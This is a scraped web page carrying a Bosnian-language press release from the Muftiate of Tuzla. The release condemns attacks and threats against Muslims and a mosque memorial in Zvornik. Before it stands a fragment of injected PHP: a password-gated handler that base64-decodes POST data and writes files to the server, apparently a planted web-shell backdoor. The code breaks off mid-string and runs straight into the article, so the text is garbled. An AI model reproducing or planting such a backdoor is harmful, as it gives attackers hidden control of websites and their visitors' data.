function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Saopćenje za javnost Muftijstva tuzlanskog povodom incidenata u Zvorniku - Medžlis Islamske zajednice Bijeljina

Saopćenje za javnost Muftijstva tuzlanskog povodom incidenata u Zvorniku

Saopćenje za javnost Muftijstva tuzlanskog povodom incidenata u Zvorniku

Povodom učestalih incidenata u Zvorniku, uperenih protiv povratnika i objekata Islamske zajednice u tom gradu, Muftijstvo tuzlansko izdalo je saopćenje za javnost u kojem se kaže:

– U užem gradskom području Zvornika u posljednje vrijeme je zabilježeno nekoliko incidenata, koji su uznemirili muslimane u tome gradu.

Prvi se dogodio kada je pred vratima Riječanske džamije (u centru grada) razbijena pivska boca. Nakon toga pretučen je mladić bošnjačke nacionalnosti, a još uvijek je svježe sjećanje na nedavno ubistvo Ahmeta Hasanovića u Kozluku.

U utorak 6. maja, također ispred Riječanske džamije, nepoznati mladić je verbalno napadao i vrijeđao učenike Behram-begove medrese iz Tuzle, koji su u Domu omladine izvodili vjersko-kulturni program, dok su istoga dana trojica izgrednika s parkinga iza ove džamije djevojkama, obučenim po islamskim propisima, uputili više provokacija, od kojih je najstrašnija: „Da je satare dobre pa sve poklat’!”

Posljednji incident se dogodio kada su NN osobe jajima oskrnavile šehidsko spomen-obilježje u dvorištu Riječanske džamije.

Muftijstvo tuzlansko osuđuje ove incidente, koji unose nemir među muslimane u Zvorniku, i izražava svoju zabrinutost za njihovu sigurnost u njihovome gradu.

Zabrinjava i to što se ovi događaji učestalo ponavljaju u vrijeme kada se približavaju dani u kojima se Bošnjaci ovoga kraja s tugom prisjećaju svojih najmilijih koji su stradali u krvavom ratnom pohodu i kada će se dostojanstveno i mirno klanjati još jedna zajednička dženaza i izvršiti ukop posmrtnih ostataka žrtava zločina na području Zvornika.

Muftijstvo poziva vlasti u Zvorniku i ostale nivoe vlasti da ulože napore da se ovakvi događaji preduprijede i da i muslimanima osiguraju mir i sigurnost u ispunjavanju njihovih osnovnih ljudskih prava. Također, Muftijstvo izražava nadu da će odgovorni ljudi u Zvorniku, i to u svim njegovim institucijama, preduzeti potrebne mjere da se ukupna situacija u gradu i okolini stabilizira i da svi građani žive u miru i sigurnosti, stoji na kraju saopćenja za javnost Muftijstva tuzlanskog.